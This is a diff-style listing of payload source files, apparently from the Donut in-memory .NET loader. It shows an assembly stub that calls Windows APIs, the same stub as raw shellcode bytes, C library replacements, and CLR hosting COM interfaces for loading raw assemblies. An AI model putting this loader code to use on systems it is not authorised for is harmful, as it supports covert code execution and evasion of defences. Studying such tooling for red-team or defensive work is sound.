24 ; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
25 ; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
26 ; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
27 ; POSSIBILITY OF SUCH DAMAGE.
28 ;
29 ;
30 ; void call_api(FARPROC api, int param_cnt, WCHAR param[]);
31
32 %define DONUT_MAX_PARAM 8
33 %define DONUT_MAX_NAME 256
34
35 struc HOME_SPACE
36 ._rcx resq 1
37 ._rdx resq 1
38 ._r8 resq 1
39 ._r9 resq 1
40 endstruc
41
42 struc _ds
43 .hs: resq HOME_SPACE_size
44
45 .arg4 resq 1
46 .arg5 resq 1
47 .arg6 resq 1
48 .arg7 resq 1
49
50 ._rdi resq 1
51 ._rsi resq 1
52 ._rbp resq 1
53 ._rbx resq 1
54 ._rsp resq 1
55 endstruc
56
57 %ifndef BIN
58 global call_api
59 global _call_api
60 %endif
61
62 call_api:
63 _call_api:
64 bits 32
65
66 ; int3
67
68 xor eax, eax ;
69 dec eax ;
70 jns L2 ; if SF=0, goto x64
71
72 mov eax, [esp+ 4] ; eax = api address
73 mov ecx, [esp+ 8] ; ecx = param_cnt
74 mov edx, [esp+12] ; edx = params
75 L1:
76 push edx ; save params[i] on stack
77 add edx, DONUT_MAX_NAME * 2 ; advance to next element
78 sub ecx, 1 ; subtract one from param_cnt
79 jnz L1
80 call eax ; call api
81 ret
82
83 L2:
84 bits 64
85
86 sub rsp, ((_ds_size & -16) + 16) - 8
87
88 mov [rsp+_ds._rbp], rbp
89 mov [rsp+_ds._rbx], rbx
90 mov [rsp+_ds._rdi], rdi
91 mov [rsp+_ds._rsi], rsi
92
93 mov rsi, rsp ; rsi = rsp after allocation
94 mov rdi, rcx ; rdi = api to call
95 mov eax, DONUT_MAX_NAME * 2
96
97 mov rcx, r8 ; rcx = param[0]
98 lea rdx, [rcx+rax] ; rdx = param[1]
99 lea r8, [rdx+rax] ; r8 = param[2]
100 lea r9, [r8+rax] ; r9 = param[3]
101
102 lea rbx, [r9+rax]
103 mov [rsp+_ds.arg4], rbx ; param[4]
104 add rbx, rax
105 mov [rsp+_ds.arg5], rbx ; param[5]
106 add rbx, rax
107 mov [rsp+_ds.arg6], rbx ; param[6]
108 add rbx, rax
109 mov [rsp+_ds.arg7], rbx ; param[7]
110 call rdi
111
112 mov rsp, rsi ; restore rsp after allocation
113 mov rsi, [rsp+_ds._rsi]
114 mov rdi, [rsp+_ds._rdi]
115 mov rbx, [rsp+_ds._rbx]
116 mov rbp, [rsp+_ds._rbp]
117
118 add rsp, ((_ds_size & -16) + 16) - 8
119 ret
120
+50
-0
payload/call_api_bin.h less more
0
1 unsigned int CALL_API_BIN[47];
2
3 CALL_API_BIN[0] = 0x7948C031;
4 CALL_API_BIN[1] = 0x24448B1B;
5 CALL_API_BIN[2] = 0x244C8B04;
6 CALL_API_BIN[3] = 0x24548B08;
7 CALL_API_BIN[4] = 0xC281520C;
8 CALL_API_BIN[5] = 0x00000200;
9 CALL_API_BIN[6] = 0x7501E983;
10 CALL_API_BIN[7] = 0xC3D0FFF4;
11 CALL_API_BIN[8] = 0x48EC8148;
12 CALL_API_BIN[9] = 0x48000001;
13 CALL_API_BIN[10] = 0x3024AC89;
14 CALL_API_BIN[11] = 0x48000001;
15 CALL_API_BIN[12] = 0x38249C89;
16 CALL_API_BIN[13] = 0x48000001;
17 CALL_API_BIN[14] = 0x2024BC89;
18 CALL_API_BIN[15] = 0x48000001;
19 CALL_API_BIN[16] = 0x2824B489;
20 CALL_API_BIN[17] = 0x48000001;
21 CALL_API_BIN[18] = 0x8948E689;
22 CALL_API_BIN[19] = 0x0200B8CF;
23 CALL_API_BIN[20] = 0x894C0000;
24 CALL_API_BIN[21] = 0x148D48C1;
25 CALL_API_BIN[22] = 0x048D4C01;
26 CALL_API_BIN[23] = 0x0C8D4D02;
27 CALL_API_BIN[24] = 0x1C8D4900;
28 CALL_API_BIN[25] = 0x9C894801;
29 CALL_API_BIN[26] = 0x00010024;
30 CALL_API_BIN[27] = 0xC3014800;
31 CALL_API_BIN[28] = 0x249C8948;
32 CALL_API_BIN[29] = 0x00000108;
33 CALL_API_BIN[30] = 0x48C30148;
34 CALL_API_BIN[31] = 0x10249C89;
35 CALL_API_BIN[32] = 0x48000001;
36 CALL_API_BIN[33] = 0x8948C301;
37 CALL_API_BIN[34] = 0x0118249C;
38 CALL_API_BIN[35] = 0xD7FF0000;
39 CALL_API_BIN[36] = 0x48F48948;
40 CALL_API_BIN[37] = 0x2824B48B;
41 CALL_API_BIN[38] = 0x48000001;
42 CALL_API_BIN[39] = 0x2024BC8B;
43 CALL_API_BIN[40] = 0x48000001;
44 CALL_API_BIN[41] = 0x38249C8B;
45 CALL_API_BIN[42] = 0x48000001;
46 CALL_API_BIN[43] = 0x3024AC8B;
47 CALL_API_BIN[44] = 0x48000001;
48 CALL_API_BIN[45] = 0x0148C481;
49 CALL_API_BIN[46] = 0x00C30000;
+74
-0
payload/clib.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <inttypes.h>
32 #include <stddef.h>
33
34 // functions to replace intrinsic C library functions
35
36 // funnily enough, MSVC still tries to replace this
37 // with memset hence the use of assembly..
38 void *Memset (void *ptr, int value, size_t num) {
39
40 #ifdef _MSC_VER
41 __stosb(ptr, value, num);
42 #else
43 unsigned char *p = (unsigned char*)ptr;
44
45 while(num--) {
46 *p = value;
47 p++;
48 }
49 #endif
50 return ptr;
51 }
52
53 void *Memcpy (void *destination, const void *source, size_t num) {
54 unsigned char *out = (unsigned char*)destination;
55 unsigned char *in = (unsigned char*)source;
56
57 while(num--) {
58 *out = *in;
59 out++; in++;
60 }
61 return destination;
62 }
63
64 int Memcmp(const void *ptr1, const void *ptr2, size_t num) {
65 register const unsigned char *s1 = (const unsigned char*)ptr1;
66 register const unsigned char *s2 = (const unsigned char*)ptr2;
67
68 while (num-- > 0) {
69 if (*s1++ != *s2++)
70 return s1[-1] < s2[-1] ? -1 : 1;
71 }
72 return 0;
73 }
+916
-0
payload/clr.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef CLR_H
32 #define CLR_H
33
34 typedef struct _ICLRMetaHost ICLRMetaHost;
35 typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo;
36 typedef struct _ICorRuntimeHost ICorRuntimeHost;
37 typedef struct _ICorConfiguration ICorConfiguration;
38 typedef struct _IGCThreadControl IGCThreadControl;
39 typedef struct _IGCHostControl IGCHostControl;
40 typedef struct _IDebuggerThreadControl IDebuggerThreadControl;
41 typedef struct _AppDomain IAppDomain;
42 typedef struct _Assembly IAssembly;
43 typedef struct _Type IType;
44 typedef struct _Binder IBinder;
45 typedef struct _MethodInfo IMethodInfo;
46
47 typedef void *HDOMAINENUM;
48
49 typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )(
50 REFCLSID clsid,
51 REFIID riid,
52 LPVOID *ppInterface);
53
54 typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )(
55 REFCLSID clsid,
56 REFIID riid,
57 LPVOID *ppInterface);
58
59
60 typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void);
61
62 typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void);
63
64 typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )(
65 ICLRRuntimeInfo *pRuntimeInfo,
66 CallbackThreadSetFnPtr pfnCallbackThreadSet,
67 CallbackThreadUnsetFnPtr pfnCallbackThreadUnset);
68
69 #undef DUMMY_METHOD
70 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
71
72 typedef struct _BinderVtbl {
73 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
74 IBinder * This,
75 /* [in] */ REFIID riid,
76 /* [iid_is][out] */ void **ppvObject);
77
78 ULONG ( STDMETHODCALLTYPE *AddRef )(
79 IBinder * This);
80
81 ULONG ( STDMETHODCALLTYPE *Release )(
82 IBinder * This);
83
84 DUMMY_METHOD(GetTypeInfoCount);
85 DUMMY_METHOD(GetTypeInfo);
86 DUMMY_METHOD(GetIDsOfNames);
87 DUMMY_METHOD(Invoke);
88 DUMMY_METHOD(ToString);
89 DUMMY_METHOD(Equals);
90 DUMMY_METHOD(GetHashCode);
91 DUMMY_METHOD(GetType);
92 DUMMY_METHOD(BindToMethod);
93 DUMMY_METHOD(BindToField);
94 DUMMY_METHOD(SelectMethod);
95 DUMMY_METHOD(SelectProperty);
96 DUMMY_METHOD(ChangeType);
97 DUMMY_METHOD(ReorderArgumentArray);
98 } BinderVtbl;
99
100 typedef struct _Binder {
101 BinderVtbl *lpVtbl;
102 } Binder;
103
104 #undef DUMMY_METHOD
105 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This)
106
107 typedef struct _AppDomainVtbl {
108 BEGIN_INTERFACE
109
110 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
111 IAppDomain * This,
112 /* [in] */ REFIID riid,
113 /* [iid_is][out] */ void **ppvObject);
114
115 ULONG ( STDMETHODCALLTYPE *AddRef )(
116 IAppDomain * This);
117
118 ULONG ( STDMETHODCALLTYPE *Release )(
119 IAppDomain * This);
120
121 DUMMY_METHOD(GetTypeInfoCount);
122 DUMMY_METHOD(GetTypeInfo);
123 DUMMY_METHOD(GetIDsOfNames);
124 DUMMY_METHOD(Invoke);
125
126 DUMMY_METHOD(ToString);
127 DUMMY_METHOD(Equals);
128 DUMMY_METHOD(GetHashCode);
129 DUMMY_METHOD(GetType);
130 DUMMY_METHOD(InitializeLifetimeService);
131 DUMMY_METHOD(GetLifetimeService);
132 DUMMY_METHOD(Evidence);
133 DUMMY_METHOD(add_DomainUnload);
134 DUMMY_METHOD(remove_DomainUnload);
135 DUMMY_METHOD(add_AssemblyLoad);
136 DUMMY_METHOD(remove_AssemblyLoad);
137 DUMMY_METHOD(add_ProcessExit);
138 DUMMY_METHOD(remove_ProcessExit);
139 DUMMY_METHOD(add_TypeResolve);
140 DUMMY_METHOD(remove_TypeResolve);
141 DUMMY_METHOD(add_ResourceResolve);
142 DUMMY_METHOD(remove_ResourceResolve);
143 DUMMY_METHOD(add_AssemblyResolve);
144 DUMMY_METHOD(remove_AssemblyResolve);
145 DUMMY_METHOD(add_UnhandledException);
146 DUMMY_METHOD(remove_UnhandledException);
147 DUMMY_METHOD(DefineDynamicAssembly);
148 DUMMY_METHOD(DefineDynamicAssembly_2);
149 DUMMY_METHOD(DefineDynamicAssembly_3);
150 DUMMY_METHOD(DefineDynamicAssembly_4);
151 DUMMY_METHOD(DefineDynamicAssembly_5);
152 DUMMY_METHOD(DefineDynamicAssembly_6);
153 DUMMY_METHOD(DefineDynamicAssembly_7);
154 DUMMY_METHOD(DefineDynamicAssembly_8);
155 DUMMY_METHOD(DefineDynamicAssembly_9);
156 DUMMY_METHOD(CreateInstance);
157 DUMMY_METHOD(CreateInstanceFrom);
158 DUMMY_METHOD(CreateInstance_2);
159 DUMMY_METHOD(CreateInstanceFrom_2);
160 DUMMY_METHOD(CreateInstance_3);
161 DUMMY_METHOD(CreateInstanceFrom_3);
162 DUMMY_METHOD(Load);
163 DUMMY_METHOD(Load_2);
164
165 HRESULT (STDMETHODCALLTYPE *Load_3)(
166 IAppDomain *This,
167 SAFEARRAY *rawAssembly,
168 IAssembly **pRetVal);
169
170 DUMMY_METHOD(Load_4);
171 DUMMY_METHOD(Load_5);
172 DUMMY_METHOD(Load_6);
173 DUMMY_METHOD(Load_7);
174 DUMMY_METHOD(ExecuteAssembly);
175 DUMMY_METHOD(ExecuteAssembly_2);
176 DUMMY_METHOD(ExecuteAssembly_3);
177 DUMMY_METHOD(FriendlyName);
178 DUMMY_METHOD(BaseDirectory);
179 DUMMY_METHOD(RelativeSearchPath);
180 DUMMY_METHOD(ShadowCopyFiles);
181 DUMMY_METHOD(GetAssemblies);
182 DUMMY_METHOD(AppendPrivatePath);
183 DUMMY_METHOD(ClearPrivatePath);
184 DUMMY_METHOD(SetShadowCopyPath);
185 DUMMY_METHOD(ClearShadowCopyPath);
186 DUMMY_METHOD(SetCachePath);
187 DUMMY_METHOD(SetData);
188 DUMMY_METHOD(GetData);
189 DUMMY_METHOD(SetAppDomainPolicy);
190 DUMMY_METHOD(SetThreadPrincipal);
191 DUMMY_METHOD(SetPrincipalPolicy);
192 DUMMY_METHOD(DoCallBack);
193 DUMMY_METHOD(DynamicDirectory);
194
195 END_INTERFACE
196 } AppDomainVtbl;
197
198 typedef struct _AppDomain {
199 AppDomainVtbl *lpVtbl;
200 } AppDomain;
201
202 #undef DUMMY_METHOD
203 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This)
204
205 typedef struct _AssemblyVtbl {
206 BEGIN_INTERFACE
207
208 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
209 IAssembly * This,
210 REFIID riid,
211 void **ppvObject);
212
213 ULONG ( STDMETHODCALLTYPE *AddRef )(
214 IAssembly * This);
215
216 ULONG ( STDMETHODCALLTYPE *Release )(
217 IAssembly * This);
218
219 DUMMY_METHOD(GetTypeInfoCount);
220 DUMMY_METHOD(GetTypeInfo);
221 DUMMY_METHOD(GetIDsOfNames);
222
223 DUMMY_METHOD(Invoke);
224 DUMMY_METHOD(ToString);
225 DUMMY_METHOD(Equals);
226 DUMMY_METHOD(GetHashCode);
227 DUMMY_METHOD(GetType);
228 DUMMY_METHOD(CodeBase);
229 DUMMY_METHOD(EscapedCodeBase);
230 DUMMY_METHOD(GetName);
231 DUMMY_METHOD(GetName_2);
232 DUMMY_METHOD(FullName);
233
234 HRESULT (STDMETHODCALLTYPE *EntryPoint)(
235 IAssembly *This,
236 IMethodInfo **pRetVal);
237
238 HRESULT (STDMETHODCALLTYPE *GetType_2)(
239 IAssembly *This,
240 BSTR name,
241 IType **pRetVal);
242
243 DUMMY_METHOD(GetType_3);
244 DUMMY_METHOD(GetExportedTypes);
245 DUMMY_METHOD(GetTypes);
246 DUMMY_METHOD(GetManifestResourceStream);
247 DUMMY_METHOD(GetManifestResourceStream_2);
248 DUMMY_METHOD(GetFile);
249 DUMMY_METHOD(GetFiles);
250 DUMMY_METHOD(GetFiles_2);
251 DUMMY_METHOD(GetManifestResourceNames);
252 DUMMY_METHOD(GetManifestResourceInfo);
253 DUMMY_METHOD(Location);
254 DUMMY_METHOD(Evidence);
255 DUMMY_METHOD(GetCustomAttributes);
256 DUMMY_METHOD(GetCustomAttributes_2);
257 DUMMY_METHOD(IsDefined);
258 DUMMY_METHOD(GetObjectData);
259 DUMMY_METHOD(add_ModuleResolve);
260 DUMMY_METHOD(remove_ModuleResolve);
261 DUMMY_METHOD(GetType_4);
262 DUMMY_METHOD(GetSatelliteAssembly);
263 DUMMY_METHOD(GetSatelliteAssembly_2);
264 DUMMY_METHOD(LoadModule);
265 DUMMY_METHOD(LoadModule_2);
266 DUMMY_METHOD(CreateInstance);
267 DUMMY_METHOD(CreateInstance_2);
268 DUMMY_METHOD(CreateInstance_3);
269 DUMMY_METHOD(GetLoadedModules);
270 DUMMY_METHOD(GetLoadedModules_2);
271 DUMMY_METHOD(GetModules);
272 DUMMY_METHOD(GetModules_2);
273 DUMMY_METHOD(GetModule);
274 DUMMY_METHOD(GetReferencedAssemblies);
275 DUMMY_METHOD(GlobalAssemblyCache);
276
277 END_INTERFACE
278 } AssemblyVtbl;
279
280 typedef enum _BindingFlags {
281 BindingFlags_Default = 0,
282 BindingFlags_IgnoreCase = 1,
283 BindingFlags_DeclaredOnly = 2,
284 BindingFlags_Instance = 4,
285 BindingFlags_Static = 8,
286 BindingFlags_Public = 16,
287 BindingFlags_NonPublic = 32,
288 BindingFlags_FlattenHierarchy = 64,
289 BindingFlags_InvokeMethod = 256,
290 BindingFlags_CreateInstance = 512,
291 BindingFlags_GetField = 1024,
292 BindingFlags_SetField = 2048,
293 BindingFlags_GetProperty = 4096,
294 BindingFlags_SetProperty = 8192,
295 BindingFlags_PutDispProperty = 16384,
296 BindingFlags_PutRefDispProperty = 32768,
297 BindingFlags_ExactBinding = 65536,
298 BindingFlags_SuppressChangeType = 131072,
299 BindingFlags_OptionalParamBinding = 262144,
300 BindingFlags_IgnoreReturn = 16777216
301 } BindingFlags;
302
303 typedef struct _Assembly {
304 AssemblyVtbl *lpVtbl;
305 } Assembly;
306
307 #undef DUMMY_METHOD
308 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This)
309
310 typedef struct _TypeVtbl {
311 BEGIN_INTERFACE
312
313 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
314 IType * This,
315 REFIID riid,
316 void **ppvObject);
317
318 ULONG ( STDMETHODCALLTYPE *AddRef )(
319 IType * This);
320
321 ULONG ( STDMETHODCALLTYPE *Release )(
322 IType * This);
323
324 DUMMY_METHOD(GetTypeInfoCount);
325 DUMMY_METHOD(GetTypeInfo);
326 DUMMY_METHOD(GetIDsOfNames);
327 DUMMY_METHOD(Invoke);
328
329 DUMMY_METHOD(ToString);
330 DUMMY_METHOD(Equals);
331 DUMMY_METHOD(GetHashCode);
332 DUMMY_METHOD(GetType);
333 DUMMY_METHOD(MemberType);
334 DUMMY_METHOD(name);
335 DUMMY_METHOD(DeclaringType);
336 DUMMY_METHOD(ReflectedType);
337 DUMMY_METHOD(GetCustomAttributes);
338 DUMMY_METHOD(GetCustomAttributes_2);
339 DUMMY_METHOD(IsDefined);
340 DUMMY_METHOD(Guid);
341 DUMMY_METHOD(Module);
342 DUMMY_METHOD(Assembly);
343 DUMMY_METHOD(TypeHandle);
344 DUMMY_METHOD(FullName);
345 DUMMY_METHOD(Namespace);
346 DUMMY_METHOD(AssemblyQualifiedName);
347 DUMMY_METHOD(GetArrayRank);
348 DUMMY_METHOD(BaseType);
349 DUMMY_METHOD(GetConstructors);
350 DUMMY_METHOD(GetInterface);
351 DUMMY_METHOD(GetInterfaces);
352 DUMMY_METHOD(FindInterfaces);
353 DUMMY_METHOD(GetEvent);
354 DUMMY_METHOD(GetEvents);
355 DUMMY_METHOD(GetEvents_2);
356 DUMMY_METHOD(GetNestedTypes);
357 DUMMY_METHOD(GetNestedType);
358 DUMMY_METHOD(GetMember);
359 DUMMY_METHOD(GetDefaultMembers);
360 DUMMY_METHOD(FindMembers);
361 DUMMY_METHOD(GetElementType);
362 DUMMY_METHOD(IsSubclassOf);
363 DUMMY_METHOD(IsInstanceOfType);
364 DUMMY_METHOD(IsAssignableFrom);
365 DUMMY_METHOD(GetInterfaceMap);
366 DUMMY_METHOD(GetMethod);
367 DUMMY_METHOD(GetMethod_2);
368 DUMMY_METHOD(GetMethods);
369 DUMMY_METHOD(GetField);
370 DUMMY_METHOD(GetFields);
371 DUMMY_METHOD(GetProperty);
372 DUMMY_METHOD(GetProperty_2);
373 DUMMY_METHOD(GetProperties);
374 DUMMY_METHOD(GetMember_2);
375 DUMMY_METHOD(GetMembers);
376 DUMMY_METHOD(InvokeMember);
377 DUMMY_METHOD(UnderlyingSystemType);
378 DUMMY_METHOD(InvokeMember_2);
379
380 HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
381 IType *This,
382 BSTR name,
383 BindingFlags invokeAttr,
384 IBinder *Binder,
385 VARIANT Target,
386 SAFEARRAY *args,
387 VARIANT *pRetVal);
388
389 DUMMY_METHOD(GetConstructor);
390 DUMMY_METHOD(GetConstructor_2);
391 DUMMY_METHOD(GetConstructor_3);
392 DUMMY_METHOD(GetConstructors_2);
393 DUMMY_METHOD(TypeInitializer);
394 DUMMY_METHOD(GetMethod_3);
395 DUMMY_METHOD(GetMethod_4);
396 DUMMY_METHOD(GetMethod_5);
397 DUMMY_METHOD(GetMethod_6);
398 DUMMY_METHOD(GetMethods_2);
399 DUMMY_METHOD(GetField_2);
400 DUMMY_METHOD(GetFields_2);
401 DUMMY_METHOD(GetInterface_2);
402 DUMMY_METHOD(GetEvent_2);
403 DUMMY_METHOD(GetProperty_3);
404 DUMMY_METHOD(GetProperty_4);
405 DUMMY_METHOD(GetProperty_5);
406 DUMMY_METHOD(GetProperty_6);
407 DUMMY_METHOD(GetProperty_7);
408 DUMMY_METHOD(GetProperties_2);
409 DUMMY_METHOD(GetNestedTypes_2);
410 DUMMY_METHOD(GetNestedType_2);
411 DUMMY_METHOD(GetMember_3);
412 DUMMY_METHOD(GetMembers_2);
413 DUMMY_METHOD(Attributes);
414 DUMMY_METHOD(IsNotPublic);
415 DUMMY_METHOD(IsPublic);
416 DUMMY_METHOD(IsNestedPublic);
417 DUMMY_METHOD(IsNestedPrivate);
418 DUMMY_METHOD(IsNestedFamily);
419 DUMMY_METHOD(IsNestedAssembly);
420 DUMMY_METHOD(IsNestedFamANDAssem);
421 DUMMY_METHOD(IsNestedFamORAssem);
422 DUMMY_METHOD(IsAutoLayout);
423 DUMMY_METHOD(IsLayoutSequential);
424 DUMMY_METHOD(IsExplicitLayout);
425 DUMMY_METHOD(IsClass);
426 DUMMY_METHOD(IsInterface);
427 DUMMY_METHOD(IsValueType);
428 DUMMY_METHOD(IsAbstract);
429 DUMMY_METHOD(IsSealed);
430 DUMMY_METHOD(IsEnum);
431 DUMMY_METHOD(IsSpecialName);
432 DUMMY_METHOD(IsImport);
433 DUMMY_METHOD(IsSerializable);
434 DUMMY_METHOD(IsAnsiClass);
435 DUMMY_METHOD(IsUnicodeClass);
436 DUMMY_METHOD(IsAutoClass);
437 DUMMY_METHOD(IsArray);
438 DUMMY_METHOD(IsByRef);
439 DUMMY_METHOD(IsPointer);
440 DUMMY_METHOD(IsPrimitive);
441 DUMMY_METHOD(IsCOMObject);
442 DUMMY_METHOD(HasElementType);
443 DUMMY_METHOD(IsContextful);
444 DUMMY_METHOD(IsMarshalByRef);
445 DUMMY_METHOD(Equals_2);
446
447 END_INTERFACE
448 } TypeVtbl;
449
450 typedef struct ICLRRuntimeInfoVtbl
451 {
452 BEGIN_INTERFACE
453
454 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
455 ICLRRuntimeInfo * This,
456 /* [in] */ REFIID riid,
457 /* [iid_is][out] */
458 __RPC__deref_out void **ppvObject);
459
460 ULONG ( STDMETHODCALLTYPE *AddRef )(
461 ICLRRuntimeInfo * This);
462
463 ULONG ( STDMETHODCALLTYPE *Release )(
464 ICLRRuntimeInfo * This);
465
466 HRESULT ( STDMETHODCALLTYPE *GetVersionString )(
467 ICLRRuntimeInfo * This,
468 /* [size_is][out] */
469 __out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer,
470 /* [out][in] */ DWORD *pcchBuffer);
471
472 HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )(
473 ICLRRuntimeInfo * This,
474 /* [size_is][out] */
475 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
476 /* [out][in] */ DWORD *pcchBuffer);
477
478 HRESULT ( STDMETHODCALLTYPE *IsLoaded )(
479 ICLRRuntimeInfo * This,
480 /* [in] */ HANDLE hndProcess,
481 /* [retval][out] */ BOOL *pbLoaded);
482
483 HRESULT ( STDMETHODCALLTYPE *LoadErrorString )(
484 ICLRRuntimeInfo * This,
485 /* [in] */ UINT iResourceID,
486 /* [size_is][out] */
487 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
488 /* [out][in] */ DWORD *pcchBuffer,
489 /* [lcid][in] */ LONG iLocaleID);
490
491 HRESULT ( STDMETHODCALLTYPE *LoadLibrary )(
492 ICLRRuntimeInfo * This,
493 /* [in] */ LPCWSTR pwzDllName,
494 /* [retval][out] */ HMODULE *phndModule);
495
496 HRESULT ( STDMETHODCALLTYPE *GetProcAddress )(
497 ICLRRuntimeInfo * This,
498 /* [in] */ LPCSTR pszProcName,
499 /* [retval][out] */ LPVOID *ppProc);
500
501 HRESULT ( STDMETHODCALLTYPE *GetInterface )(
502 ICLRRuntimeInfo * This,
503 /* [in] */ REFCLSID rclsid,
504 /* [in] */ REFIID riid,
505 /* [retval][iid_is][out] */ LPVOID *ppUnk);
506
507 HRESULT ( STDMETHODCALLTYPE *IsLoadable )(
508 ICLRRuntimeInfo * This,
509 /* [retval][out] */ BOOL *pbLoadable);
510
511 HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )(
512 ICLRRuntimeInfo * This,
513 /* [in] */ DWORD dwStartupFlags,
514 /* [in] */ LPCWSTR pwzHostConfigFile);
515
516 HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )(
517 ICLRRuntimeInfo * This,
518 /* [out] */ DWORD *pdwStartupFlags,
519 /* [size_is][out] */
520 __out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile,
521 /* [out][in] */ DWORD *pcchHostConfigFile);
522
523 HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )(
524 ICLRRuntimeInfo * This);
525
526 HRESULT ( STDMETHODCALLTYPE *IsStarted )(
527 ICLRRuntimeInfo * This,
528 /* [out] */ BOOL *pbStarted,
529 /* [out] */ DWORD *pdwStartupFlags);
530
531 END_INTERFACE
532 } ICLRRuntimeInfoVtbl;
533
534 typedef struct _ICLRRuntimeInfo {
535 ICLRRuntimeInfoVtbl *lpVtbl;
536 } ICLRRuntimeInfo;
537
538 typedef struct _Type {
539 TypeVtbl *lpVtbl;
540 } Type;
541
542 typedef struct ICLRMetaHostVtbl
543 {
544 BEGIN_INTERFACE
545
546 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
547 ICLRMetaHost * This,
548 /* [in] */ REFIID riid,
549 /* [iid_is][out] */
550 __RPC__deref_out void **ppvObject);
551
552 ULONG ( STDMETHODCALLTYPE *AddRef )(
553 ICLRMetaHost * This);
554
555 ULONG ( STDMETHODCALLTYPE *Release )(
556 ICLRMetaHost * This);
557
558 HRESULT ( STDMETHODCALLTYPE *GetRuntime )(
559 ICLRMetaHost * This,
560 /* [in] */ LPCWSTR pwzVersion,
561 /* [in] */ REFIID riid,
562 /* [retval][iid_is][out] */ LPVOID *ppRuntime);
563
564 HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )(
565 ICLRMetaHost * This,
566 /* [in] */ LPCWSTR pwzFilePath,
567 /* [size_is][out] */
568 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
569 /* [out][in] */ DWORD *pcchBuffer);
570
571 HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )(
572 ICLRMetaHost * This,
